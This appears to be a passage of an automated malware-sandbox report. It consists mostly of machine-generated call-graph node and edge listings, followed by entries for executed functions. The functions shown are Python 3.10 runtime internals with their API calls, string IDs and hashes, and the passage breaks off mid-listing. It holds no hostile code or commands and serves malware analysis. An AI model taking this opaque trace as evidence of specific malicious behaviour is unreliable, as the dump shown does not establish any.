6c471fe0 34107->34129 34109 6c472653 34109->34047 34110->34066 34111->34066 34112->34068 34113->34077 34114->34080 34115->34082 34121 6c4bc290 34116->34121 34127 6c4bc13d 34116->34127 34117 6c4bc162 PyDescr_NewClassMethod 34117->34127 34118 6c4bc265 34123 6c4bc277 _PyErr_SetString 34118->34123 34119 6c4bc1ba PyDescr_NewMethod 34119->34127 34120 6c4bc16f PyCMethod_New 34120->34121 34122 6c4bc187 PyType_GenericAlloc 34120->34122 34121->34089 34122->34127 34123->34089 34124 6c4bc1db PyUnicode_FromString 34124->34121 34124->34127 34125 6c4bc202 PyDict_SetDefault 34125->34127 34126 6c4bc211 PyDict_SetItem 34126->34127 34127->34117 34127->34118 34127->34119 34127->34120 34127->34121 34127->34124 34127->34125 34127->34126 34128->34103 34131 6c47208f 34129->34131 34132 6c471fec 34129->34132 34130 6c472073 34130->34109 34131->34109 34132->34130 34133 6c4a7840 free 34132->34133 34133->34131 34134 6c4d30e0 34135 6c4d30ef 34134->34135 34136 6c4d3117 34134->34136 34140 6c4d3101 _PyErr_SetString 34135->34140 34137 6c4d311f 34136->34137 34138 6c4d316b 34136->34138 34141 6c4d315e 34137->34141 34142 6c4d3124 34137->34142 34151 6c4d2da0 34138->34151 34160 6c4d2e30 PyUnicode_New PyUnicode_New PyUnicode_New memcpy 34141->34160 34145 6c4d3151 34142->34145 34147 6c4d3129 34142->34147 34144 6c4d3173 34159 6c4d2f50 PyUnicode_New PyUnicode_New PyUnicode_New memcpy 34145->34159 34146 6c4d3166 34149 6c4d313b _PyErr_SetString 34147->34149 34150 6c4d3159 34152 6c4d2dbd 34151->34152 34153 6c4d2daa 34151->34153 34154 6c4d2dd4 PyUnicode_New 34152->34154 34153->34144 34155 6c4d2deb 34154->34155 34156 6c4d2de7 34154->34156 34157 6c4d2e14 memcpy 34155->34157 34158 6c4d2df2 memcpy 34155->34158 34156->34144 34157->34144 34158->34144 34159->34150 34160->34146 34976 6c4d2b20 34977 6c4d2b30 34976->34977 34978 6c4d2b53 _PyErr_SetString 34977->34978 34979 6c4d2b69 34977->34979 34980 541227 34987 541864 GetModuleHandleW 34980->34987 34982 54122f 34983 541265 _exit 34982->34983 34984 541233 34982->34984 34985 54123e 34984->34985 34986 541239 _c_exit 34984->34986 34986->34985 34987->34982 34161 6c5515e0 _PyCodec_Lookup 34162 6c5515f5 34161->34162 34163 6c5515f8 34161->34163 34164 6c551617 34163->34164 34165 6c551603 PyObject_CallFunction 34163->34165 34168 6c550c70 34164->34168 34166 6c55161f 34165->34166 34169 6c550c87 34168->34169 34170 6c550cd6 _Py_FatalError_TstateNULL 34168->34170 34172 6c550cbe _PyObject_MakeTpCall 34169->34172 34173 6c550c9d _Py_CheckFunctionResult 34169->34173 34171 6c550cf0 34170->34171 34177 6c550d10 34171->34177 34181 6c553610 34171->34181 34172->34166 34173->34166 34175 6c550d40 34178 6c550d96 PyList_Append 34175->34178 34180 6c550d3b __cftof 34175->34180 34176 6c550d1b PyUnicode_FromString 34176->34180 34177->34175 34177->34176 34177->34180 34178->34166 34180->34166 34182 6c553635 __cftof 34181->34182 34193 6c553768 34181->34193 34183 6c4725a0 free 34182->34183 34182->34193 34184 6c553662 34183->34184 34185 6c4725a0 free 34184->34185 34184->34193 34190 6c553685 34185->34190 34186 6c553695 PyCMethod_New 34186->34190 34186->34193 34187 6c553610 free 34187->34190 34188 6c55370f PyDict_SetItemString 34188->34190 34189 6c5536fb _PyErr_SetString 34189->34190 34190->34186 34190->34187 34190->34188 34190->34189 34191 6c553745 PyUnicode_FromString 34190->34191 34190->34193 34192 6c553758 PyImport_Import 34191->34192 34191->34193 34192->34193 34193->34177 34194 6c5697e0 34195 6c569804 __cftof 34194->34195 34196 6c569895 34195->34196 34197 6c56980f _wfopen 34195->34197 34197->34196 34198 6c569822 _fileno _set_thread_local_invalid_parameter_handler _get_osfhandle _set_thread_local_invalid_parameter_handler 34197->34198 34199 6c569888 fclose 34198->34199 34200 6c569859 34198->34200 34199->34196 34201 6c569863 GetFileType 34200->34201 34202 6c56986f SetHandleInformation 34200->34202 34201->34202 34203 6c56987e 34201->34203 34202->34199 34202->34203 34988 6c467830 34989 6c46785e 34988->34989 34990 6c46793a _PyObject_MakeTpCall 34988->34990 34989->34990 34991 6c467870 34989->34991 34998 6c46788f 34991->34998 35000 6c468b10 34991->35000 34993 6c4678e3 34995 6c4678e7 _PyErr_Format 34993->34995 34996 6c467931 34993->34996 34994 6c46789c 34997 6c467905 34997->34996 34999 6c46791a _PyErr_FormatFromCauseTstate 34997->34999 34998->34993 34998->34994 34998->34997 34999->34996 35001 6c468c6f _PyErr_NoMemory 35000->35001 35002 6c468b39 35000->35002 35001->34998 35002->35001 35003 6c468b68 PyTuple_New 35002->35003 35004 6c468b7a 35003->35004 35006 6c468b93 __cftof 35003->35006 35004->34998 35005 6c468c5e 35005->34998 35006->35005 35007 6c468c33 _PyErr_SetString 35006->35007 35008 6c468c52 35007->35008 35008->34998 35009 6c468430 35010 6c468442 35009->35010 35011 6c4684b8 35009->35011 35010->35011 35014 6c468449 __cftof 35010->35014 35012 6c4684d2 35011->35012 35013 6c4684be _PyErr_SetString 35011->35013 35013->35012 35014->35012 35015 6c468456 PyObject_GetAttr 35014->35015 35015->35012 35016 6c468466 35015->35016 35017 6c46846f _PyErr_Format 35016->35017 35018 6c46848a 35016->35018 35017->35018 35019 6c467ab0 35020 6c467af2 35019->35020 35021 6c467ad2 _PyErr_Format 35019->35021 35020->35021 35023 6c467af9 35020->35023 35022 6c467ae9 35021->35022 35024 6c467bc1 35023->35024 35025 6c468b10 3 API calls 35023->35025 35026 6c467b29 35025->35026 35026->35022 35027 6c467b6a 35026->35027 35031 6c467b8c 35026->35031 35028 6c467b6e _PyErr_Format 35027->35028 35029 6c467bb8 35027->35029 35030 6c467ba1 _PyErr_FormatFromCauseTstate 35030->35029 35031->35029 35031->35030 35032 6c4688b0 35033 6c4688dc 35032->35033 35034 6c468a3a 35032->35034 35033->35034 35035 6c4688e7 __cftof 35033->35035 35036 6c468a54 35034->35036 35037 6c468a40 _PyErr_SetString 35034->35037 35035->35036 35040 6c4688f8 _PyObject_GetMethod 35035->35040 35052 6c5ca596 5 API calls ___raise_securityfailure 35036->35052 35037->35036 35039 6c468a64 35040->35036 35041 6c46891b 35040->35041 35042 6c468a00 35041->35042 35044 6c468944 35041->35044 35043 6c468a0a _PyErr_NoMemory 35042->35043 35045 6c4689e4 35043->35045 35046 6c4689cd _PyObject_MakeTpCall 35044->35046 35047 6c4689b4 _Py_CheckFunctionResult 35044->35047 35051 6c5ca596 5 API calls ___raise_securityfailure 35045->35051 35046->35045 35047->35045 35049 6c468a36 35051->35049 35052->35039 35053 6c473bb0 35054 6c473bc3 _PyErr_Format 35053->35054 35055 6c473bec 35053->35055 35056 6c473c01 PyObject_Hash 35055->35056 35057 6c473c15 35055->35057 35056->35057 35058 6c473c0f 35056->35058 35059 6c473c26 35057->35059 35060 6c473c32 35057->35060 35065 6c473340 35059->35065 35061 6c473020 9 API calls 35060->35061 35063 6c473c37 35061->35063 35064 6c473c2b 35066 6c472460 4 API calls 35065->35066 35067 6c473354 35066->35067 35068 6c47335a 35067->35068 35069 6c471fe0 free 35067->35069 35068->35064 35070 6c47337c 35069->35070 35070->35064 34204 6c589ae0 34205 6c589b07 34204->34205 34244 6c589faf 34204->34244 34250 6c589510 34205->34250 34209 6c589b21 34210 6c589b39 __cftof 34209->34210 34211 6c589b2e PyDict_Clear 34209->34211 34215 6c589b4e PyObject_VectorcallMethod 34210->34215 34216 6c589b67 _PyErr_WriteUnraisableMsg 34210->34216 34212 6c589b73 PyDict_Copy 34211->34212 34213 6c589b98 PyDict_Clear 34212->34213 34214 6c589b8e _PyErr_WriteUnraisableMsg 34212->34214 34306 6c475450 34213->34306 34214->34213 34215->34212 34215->34216 34216->34212 34218 6c589bb9 34219 6c589bcd 34218->34219 34220 6c589bc4 _PyErr_Clear 34218->34220 34221 6c589c0a 34219->34221 34222 6c3eb5f0 27 API calls 34219->34222 34220->34219 34225 6c589c3f PyErr_WarnExplicitFormat 34221->34225 34243 6c589cd2 34221->34243 34222->34221 34223 6c589dfb PySys_FormatStderr _PyModule_ClearDict PySys_FormatStderr 34226 6c589e2d _PyModule_ClearDict 34223->34226 34224 6c589e22 _PyModule_ClearDict 34224->34226 34227 6c589c7d 34225->34227 34228 6c589c71 _PyErr_WriteUnraisableMsg 34225->34228 34234 6c589f64 34226->34234 34249 6c589e4c __cftof 34226->34249 34229 6c589c86 PyObject_Repr 34227->34229 34227->34243 34228->34227 34231 6c589c9c PyUnicode_EncodeFSDefault 34229->34231 34232 6c589cbe _PyErr_WriteUnraisableMsg 34229->34232 34230 6c589f10 34236 6c589f1c _PyErr_Format 34230->34236 34237 6c589f41 34230->34237 34231->34232 34238 6c589cab PySys_WriteStderr 34231->34238 34232->34243 34233 6c589d42 PyType_IsSubtype 34239 6c589d54 _PyErr_Format 34233->34239 34233->34243 34234->34244 34334 6c3eb5f0 34234->34334 34235 6c589de3 34235->34223 34235->34224 34242 6c589f54 _PyErr_WriteUnraisableMsg 34236->34242 34237->34234 34237->34242 34238->34243 34239->34243 34241 6c589e71 PyType_IsSubtype 34245 6c589e83 PyType_IsSubtype 34241->34245 34241->34249 34242->34234 34243->34233 34243->34235 34247 6c589da7 PySys_FormatStderr 34243->34247 34248 6c589dbc _PyModule_ClearDict 34243->34248 34246 6c589e95 PyUnicode_FromString 34245->34246 34245->34249 34246->34249 34247->34243 34248->34243 34249->34230 34249->34241 34251 6c58953a PyUnicode_FromString 34250->34251 34252 6c58952d PySys_WriteStderr 34250->34252 34253 6c589554 PyUnicode_InternInPlace PyDict_SetItem 34251->34253 34254 6c589586 _PyErr_WriteUnraisableMsg 34251->34254 34252->34251 34255 6c589576 34253->34255 34261 6c589592 34254->34261 34255->34254 34255->34261 34256 6c5895b3 PyUnicode_FromString 34259 6c5895cd PyUnicode_InternInPlace PyDict_SetItem 34256->34259 34260 6c5895ff _PyErr_WriteUnraisableMsg 34256->34260 34257 6c5895a4 PySys_WriteStderr 34257->34256 34258 6c589709 34270 6c589710 34258->34270 34259->34261 34260->34261 34261->34256 34261->34257 34261->34260 34269 6c589616 34261->34269 34262 6c589639 PySys_WriteStderr 34263 6c589647 PyUnicode_FromString 34262->34263 34264 6c589662 PyDict_GetItemWithError 34263->34264 34263->34269 34264->34269 34265 6c589692 _PyErr_WriteUnraisableMsg 34265->34269 34266 6c5896a3 PyUnicode_FromString 34267 6c5896ef _PyErr_WriteUnraisableMsg 34266->34267 34268 6c5896bf PyUnicode_InternInPlace PyDict_SetItem 34266->34268 34267->34269 34268->34269 34269->34258 34269->34262 34269->34263 34269->34265 34269->34266 34269->34267 34271 6c58972a __cftof 34270->34271 34272 6c58973d 34271->34272 34273 6c589733 _PyErr_WriteUnraisableMsg 34271->34273 34274 6c58974a __cftof 34272->34274 34275 6c5898c3 PyObject_GetIter 34272->34275 34273->34272 34277 6c58977d PyType_IsSubtype 34274->34277 34286 6c5897a6 PySys_FormatStderr 34274->34286 34287 6c5897bc PyWeakref_NewRef 34274->34287 34288 6c589873 PyObject_SetItem 34274->34288 34292 6c589833 _PyErr_WriteUnraisableMsg 34274->34292 34296 6c5898ba 34274->34296 34297 6c589810 _PyErr_Format 34274->34297 34362 6c48cfc0 34274->34362 34276 6c5898d5 _PyErr_WriteUnraisableMsg 34275->34276 34303 6c5898e8 34275->34303 34276->34209 34277->34274 34278 6c589a80 34280 6c589aa9 34278->34280 34281 6c589a8d PyErr_GivenExceptionMatches 34278->34281 34279 6c589906 PyObject_GetItem 34282 6c589919 _PyErr_WriteUnraisableMsg 34279->34282 34279->34303 34285 6c589ab4 _PyErr_WriteUnraisableMsg 34280->34285 34280->34296 34281->34280 34284 6c589aa0 _PyErr_Clear 34281->34284 34282->34303 34283 6c589932 PyType_IsSubtype 34283->34303 34284->34280 34285->34296 34286->34274 34289 6c5897d1 PyTuple_Pack 34287->34289 34290 6c589867 _PyErr_WriteUnraisableMsg 34287->34290 34288->34274 34291 6c58988a _PyErr_WriteUnraisableMsg 34288->34291 34289->34274 34289->34292 34290->34288 34291->34274 34292->34274 34293 6c58995a PySys_FormatStderr 34293->34303 34294 6c589a20 PyObject_SetItem 34300 6c589a35 _PyErr_WriteUnraisableMsg 34294->34300 34294->34303 34295 6c589970 PyWeakref_NewRef 34298 6c589a72 _PyErr_WriteUnraisableMsg 34295->34298 34299 6c589986 PyTuple_Pack 34295->34299 34296->34209 34297->34292 34298->34294 34302 6c5899e8 _PyErr_WriteUnraisableMsg 34299->34302 34299->34303 34300->34303 34302->34303 34303->34278 34303->34279 34303->34283 34303->34293 34303->34294 34303->34295 34303->34298 34303->34302 34304 6c5899c5 _PyErr_Format 34303->34304 34305 6c48cfc0 4 API calls 34303->34305 34304->34302 34305->34303 34307 6c475932 _PyErr_Format 34306->34307 34308 6c475470 34306->34308 34318 6c47551f __cftof 34307->34318 34308->34307 34309 6c475488 34308->34309 34310 6c475799 34309->34310 34314 6c4754a5 34309->34314 34311 6c4757a0 PyDict_Keys 34310->34311 34312 6c4757ab 34310->34312 34311->34312 34313 6c4757c1 PyObject_GetIter 34312->34313 34312->34318 34315 6c4757d1 34313->34315 34317 6c475506 34314->34317 34314->34318 34319 6c475593 34314->34319 34316 6c4757e5 PyIter_Next 34315->34316 34315->34318 34316->34318 34327 6c4757f8 34316->34327 34379 6c472730 memcpy __acrt_iob_func _fileno __cftof 34317->34379 34318->34218 34332 6c4755c8 34319->34332 34380 6c4734c0 7 API calls 34319->34380 34320 6c47582f PyObject_GetItem 34320->34318 34322 6c475846 PyDict_SetItem 34320->34322 34321 6c4757fe PyDict_Contains 34321->34320 34321->34327 34322->34327 34324 6c47550d 34324->34318 34328 6c471fe0 free 34324->34328 34326 6c4758ef _PyErr_SetKeyError 34326->34318 34327->34318 34327->34320 34327->34321 34327->34326 34330 6c4758af PyErr_GivenExceptionMatches 34327->34330 34328->34318 34330->34327 34331 6c475924 _PyErr_Clear 34330->34331 34331->34318 34332->34318 34333 6c475760 _PyErr_SetKeyError 34332->34333 34381 6c473020 34332->34381 34333->34318 34335 6c3eb650 PySys_WriteStderr 34334->34335 34340 6c3eb6ec 34334->34340 34336 6c3eb662 34335->34336 34337 6c3eb6a8 PySys_FormatStderr _PyTime_GetMonotonicClock 34336->34337 34338 6c3eb67e PyOS_snprintf 34336->34338 34337->34340 34338->34336 34338->34337 34341 6c3eb7e1 _PyTuple_MaybeUntrack 34340->34341 34342 6c3eb7ee 34340->34342 34341->34340 34343 6c3eb96e 34342->34343 34345 6c3eb948 PySys_FormatStderr 34342->34345 34413 6c3eb120 34343->34413 34345->34343 34345->34345 34346 6c3eb979 34422 6c3eb390 34346->34422 34348 6c3ebb2d 34349 6c3ebb78 34348->34349 34351 6c3ebb4e PySys_FormatStderr 34348->34351 34350 6c3ebb85 GetTickCount64 34349->34350 34357 6c3ebc61 34349->34357 34359 6c3ebba3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 34350->34359 34351->34348 34352 6c3ebcd3 _PyErr_Format 34361 6c3ebcce 34352->34361 34353 6c3ebe76 _PyErr_WriteUnraisableMsg 34354 6c3ebe1e 34353->34354 34429 6c5ca596 5 API calls ___raise_securityfailure 34354->34429 34355 6c48cfc0 4 API calls 34355->34357 34357->34352 34357->34355 34357->34361 34358 6c3ebed7 34358->34244 34360 6c3ebc34 PySys_WriteStderr 34359->34360 34360->34357 34361->34353 34361->34354 34364 6c48cfd5 34362->34364 34363 6c48cfdb 34363->34274 34364->34363 34366 6c48d034 34364->34366 34369 6c4a78d0 34364->34369 34365 6c48d059 _PyErr_NoMemory 34365->34274 34366->34365 34367 6c48d03b 34366->34367 34367->34274 34370 6c4a7929 34369->34370 34373 6c4a78e1 34369->34373 34371 6c4a7978 34370->34371 34372 6c4a7956 34370->34372 34371->34373 34374 6c4a79d9 memcpy 34371->34374 34372->34373 34378 6c4a6220 realloc 34372->34378 34373->34366 34376 6c4a7840 free 34374->34376 34375 6c4a796e 34375->34366 34376->34373 34378->34375 34379->34324 34380->34332 34382 6c47303a 34381->34382 34385 6c47306a 34381->34385 34382->34385 34402 6c4734c0 7 API calls 34382->34402 34384 6c47315e 34388 6c473162 34384->34388 34389 6c472fe0 34384->34389 34385->34384 34387 6c472fe0 7 API calls 34385->34387 34385->34388 34387->34384 34388->34332 34390 6c4734c0 34389->34390 34391 6c4734d6 34390->34391 34392 6c4734f5 34390->34392 34394 6c4734e2 _PyErr_NoMemory 34391->34394 34403 6c472460 34392->34403 34394->34388 34395 6c47350c 34395->34388 34396 6c473503 34396->34395 34397 6c473623 34396->34397 34400 6c4735a3 34396->34400 34398 6c47362c memcpy 34397->34398 34401 6c4735fa 34397->34401 34398->34401 34399 6c471fe0 free 34399->34401 34400->34399 34401->34388 34402->34385 34405 6c472489 34403->34405 34404 6c4724b9 memset 34409 6c472544 memset 34404->34409 34405->34404 34406 6c47257d 34405->34406 34412 6c4a7620 malloc 34405->34412 34410 6c472587 _PyErr_NoMemory 34406->34410 34408 6c472500 34408->34404 34408->34406 34409->34396 34410->34396 34412->34408 34414 6c3eb365 34413->34414 34416 6c3eb149 34413->34416 34414->34346 34415 6c3eb163 PyType_IsSubtype 34415->34416 34416->34415 34421 6c3eb26a 34416->34421 34417 6c3eb379 _Py_FatalError_TstateNULL 34418 6c3eb2d1 _PyObject_MakeTpCall 34418->34421 34419 6c3eb2e9 _PyErr_WriteUnraisableMsg 34419->34421 34420 6c3eb2c0 _Py_CheckFunctionResult 34420->34421 34421->34414 34421->34417 34421->34418 34421->34419 34421->34420 34423 6c3eb43f 34422->34423 34424 6c3eb3ae 34422->34424 34423->34348 34424->34423 34425 6c3eb446 _PyErr_Format 34424->34425 34426 6c48cfc0 4 API calls 34424->34426 34427 6c3eb4f2 _PyErr_WriteUnraisableMsg 34424->34427 34428 6c471fe0 free 34424->34428 34425->34424 34426->34424 34427->34424 34428->34424 34429->34358 34430 6c580ae0 34433 6c57fb80 34430->34433 34434 6c57fb99 34433->34434 34440 6c57fc0d 34433->34440 34435 6c57fba7 fwrite 34434->34435 34436 6c57fbd5 34434->34436 34434->34440 34438 6c57fbd0 34435->34438 34435->34440 34439 6c57fc16 _PyBytes_Resize 34436->34439 34436->34440 34437 6c57fc74 34442 6c57fc99 34437->34442 34443 6c57f910 2 API calls 34437->34443 34438->34440 34439->34440 34440->34437 34446 6c57f910 34440->34446 34444 6c57fcbe fwrite 34442->34444 34445 6c57f910 2 API calls 34442->34445 34443->34442 34445->34444 34447 6c57f922 34446->34447 34448 6c57f92a 34446->34448 34447->34437 34449 6c57f930 fwrite 34448->34449 34450 6c57f95c 34448->34450 34449->34437 34451 6c57f99a _PyBytes_Resize 34450->34451 34452 6c57f98a 34450->34452 34453 6c57f9ad 34451->34453 34452->34437 34453->34437 35071 6c583ba0 35072 6c583bd9 35071->35072 35073 6c583bb7 PyType_IsSubtype 35071->35073 35074 6c583c38 PyModule_GetDict 35072->35074 35077 6c583bc9 __cftof 35072->35077 35073->35072 35073->35077 35075 6c583c6c PyDict_SetItemString 35074->35075 35076 6c583c45 PyModule_GetName PyErr_Format 35074->35076 35075->35077 35076->35077 35078 6c4b0e30 35079 6c4b0e9e 35078->35079 35080 6c4b0e43 PyType_IsSubtype 35078->35080 35082 6c4b0eb2 PyObject_Hash 35079->35082 35085 6c4b0ec0 35079->35085 35080->35079 35081 6c4b0e55 35080->35081 35083 6c4b0e6f 35081->35083 35084 6c4b0e5d PyType_IsSubtype 35081->35084 35082->35085 35086 6c4b0e97 35082->35086 35083->35079 35087 6c4b0e74 _PyErr_Format 35083->35087 35084->35083 35084->35087 35090 6c4ad2d0 35085->35090 35087->35086 35089 6c4b0eca 35096 6c4ad2e5 35090->35096 35091 6c4ad4b6 35097 6c4ad500 35091->35097 35098 6c4ad5c0 35091->35098 35092 6c4ad35b PyObject_RichCompare 35092->35096 35094 6c4ad349 _PyUnicode_EQ 35094->35092 35094->35097 35095 6c4ad4f9 35095->35089 35096->35091 35096->35092 35096->35094 35096->35097 35097->35089 35102 6c4ad5ec 35098->35102 35099 6c4ad68e memset 35109 6c4ad6c9 35099->35109 35100 6c4ad60f 35100->35099 35100->35109 35101 6c4ad755 35104 6c4ad761 _PyErr_NoMemory 35101->35104 35102->35100 35102->35101 35110 6c4a7620 malloc 35102->35110 35112 6c5ca596 5 API calls ___raise_securityfailure 35104->35112 35105 6c4ad751 35105->35095 35107 6c4ad67d 35107->35099 35107->35101 35108 6c4ad77d 35108->35095 35111 6c5ca596 5 API calls ___raise_securityfailure 35109->35111 35110->35107 35111->35105 35112->35108 35113 6c4f3530 35115 6c4a7620 malloc 35113->35115 35114 6c4f3541 35115->35114

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 6C566570 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 130windowCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 527 6c566570-6c56658d 528 6c566597-6c5665b5 FormatMessageW 527->528 529 6c56658f-6c566595 GetLastError 527->529 530 6c5665b7-6c5665cd PyUnicode_FromFormat 528->530 531 6c5665cf 528->531 529->528 532 6c566609-6c56660b 530->532 533 6c5665f5 531->533 534 6c5665d1 531->534 537 6c56661d-6c566627 532->537 538 6c56660d-6c56661c LocalFree 532->538 536 6c5665f9-6c566605 PyUnicode_FromWideChar 533->536 535 6c5665d4-6c5665e0 534->535 539 6c5665e7-6c5665f3 535->539 540 6c5665e2-6c5665e5 535->540 536->532 541 6c56662d-6c566632 537->541 542 6c566629-6c56662b 537->542 539->533 539->535 540->536 540->539 543 6c566635-6c56664d Py_BuildValue 541->543 542->543 544 6c56664f-6c566658 543->544 545 6c56665b-6c56665d 543->545 544->545 546 6c56665f-6c566678 _PyObject_Call 545->546 547 6c5666a8-6c5666ba LocalFree 545->547 549 6c566686-6c566688 546->549 550 6c56667a-6c566683 546->550 549->547 551 6c56668a-6c56669a call 6c565530 549->551 550->549 551->547 555 6c56669c-6c5666a5 551->555 555->547
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,6C566724,?,?,00000000,00000000,6C771ED8,00000000,?,6C4F2DA8,00000000,00000000), ref: 6C56658F
                                                                                                                                                                                                      • FormatMessageW.KERNELBASE(00001300,00000000,?,00000400,00000000,00000000,00000000,?,00000000,00000000,?,?,6C566724,?,?,00000000), ref: 6C5665AD
                                                                                                                                                                                                      • PyUnicode_FromFormat.PYTHON310(Windows Error 0x%x,?,?,6C566724,?,?,00000000,00000000,6C771ED8,00000000,?,6C4F2DA8,00000000,00000000), ref: 6C5665BD
                                                                                                                                                                                                      • PyUnicode_FromWideChar.PYTHON310(00000000,00000000,?,6C566724,?,?,00000000,00000000,6C771ED8,00000000,?,6C4F2DA8,00000000,00000000), ref: 6C5665FB
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,J4Ol,00000000,?,?,?,?,?,?,6C4F2FF8), ref: 6C56660E
                                                                                                                                                                                                      • Py_BuildValue.PYTHON310((iOOiO),00000000,00000000,?,?,6C7420B8,J4Ol,00000000,?,?,?,?,?,?,6C4F2FF8), ref: 6C566640
                                                                                                                                                                                                      • _PyObject_Call.PYTHON310(?,?,00000000,00000000,?,?,?,?,?,?,J4Ol,00000000), ref: 6C56666B
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,?,00000000,?,?,?,?,?,?,?,?,?,?,J4Ol,00000000), ref: 6C56668F
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,J4Ol,00000000,?,?,?,?,?,?,6C4F2FF8), ref: 6C5666AC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FormatFreeFromLocalUnicode_$BuildCallCharErr_ErrorLastMessageObjectObject_ValueWide
                                                                                                                                                                                                      • String ID: (iOOiO)$Windows Error 0x%x
                                                                                                                                                                                                      • API String ID: 2084463418-3903120638
                                                                                                                                                                                                      • Opcode ID: 19d6f3fbb73fc6b02f15f535eb0fbe2445a95a5d865edbef868a25a78fcb69cc
                                                                                                                                                                                                      • Instruction ID: defa7156693083c45ad6fadc5deb4a3cd731122a10fea77f120f201db22ab745
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19d6f3fbb73fc6b02f15f535eb0fbe2445a95a5d865edbef868a25a78fcb69cc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B41F672604300ABD720DF66DC05E5B77A9EFC5768F51862CF918C7AA1EB30E801CBA1
                                                                                                                                                                                                      Function 6C589AE0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 371COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 0 6c589ae0-6c589b01 1 6c589fbc-6c589fc2 0->1 2 6c589b07-6c589b2c call 6c589510 call 6c589710 0->2 7 6c589b39-6c589b4c call 6c4d2b80 2->7 8 6c589b2e-6c589b37 PyDict_Clear 2->8 14 6c589b4e-6c589b65 PyObject_VectorcallMethod 7->14 15 6c589b67-6c589b70 _PyErr_WriteUnraisableMsg 7->15 9 6c589b73-6c589b8c PyDict_Copy 8->9 12 6c589b98-6c589bc2 PyDict_Clear call 6c475450 9->12 13 6c589b8e-6c589b95 _PyErr_WriteUnraisableMsg 9->13 18 6c589bcd-6c589bcf 12->18 19 6c589bc4-6c589bca _PyErr_Clear 12->19 13->12 14->9 14->15 15->9 20 6c589bd1-6c589bd4 18->20 21 6c589be2-6c589bec 18->21 19->18 20->21 24 6c589bd6-6c589bdf 20->24 22 6c589bee-6c589c0d call 6c3eb5f0 21->22 23 6c589c17-6c589c20 21->23 22->23 26 6c589cf8-6c589cfe 23->26 27 6c589c26-6c589c2e 23->27 24->21 30 6c589df4-6c589df9 26->30 31 6c589d04-6c589d0a 26->31 27->26 29 6c589c34-6c589c39 27->29 29->26 35 6c589c3f-6c589c6f PyErr_WarnExplicitFormat 29->35 33 6c589dfb-6c589e20 PySys_FormatStderr _PyModule_ClearDict PySys_FormatStderr 30->33 34 6c589e22-6c589e28 _PyModule_ClearDict 30->34 36 6c589d10-6c589d26 31->36 37 6c589de3-6c589de6 31->37 38 6c589e2d-6c589e46 _PyModule_ClearDict 33->38 34->38 39 6c589c7d-6c589c84 35->39 40 6c589c71-6c589c7a _PyErr_WriteUnraisableMsg 35->40 41 6c589dda-6c589ddd 36->41 42 6c589d2c-6c589d32 36->42 37->30 43 6c589de8-6c589df1 37->43 44 6c589e4c-6c589e55 38->44 45 6c589f64-6c589f77 38->45 39->26 46 6c589c86-6c589c9a PyObject_Repr 39->46 40->39 41->36 41->37 42->41 47 6c589d38-6c589d40 42->47 43->30 48 6c589e5b 44->48 49 6c589f10-6c589f1a 44->49 54 6c589f79-6c589f82 45->54 55 6c589f85-6c589f93 45->55 50 6c589c9c-6c589ca9 PyUnicode_EncodeFSDefault 46->50 51 6c589cbe-6c589cd0 _PyErr_WriteUnraisableMsg 46->51 52 6c589d7b 47->52 53 6c589d42-6c589d52 PyType_IsSubtype 47->53 58 6c589e60-6c589e6f 48->58 59 6c589f1c-6c589f3f _PyErr_Format 49->59 60 6c589f41-6c589f52 call 6c48de40 49->60 50->51 61 6c589cab-6c589cbc PySys_WriteStderr 50->61 63 6c589cd2-6c589cd5 51->63 64 6c589ce3-6c589ce5 51->64 65 6c589d7e-6c589d84 52->65 53->52 62 6c589d54-6c589d79 _PyErr_Format 53->62 54->55 55->1 57 6c589f95-6c589faa call 6c3eb5f0 55->57 80 6c589faf-6c589fb2 57->80 71 6c589ece-6c589ed3 58->71 72 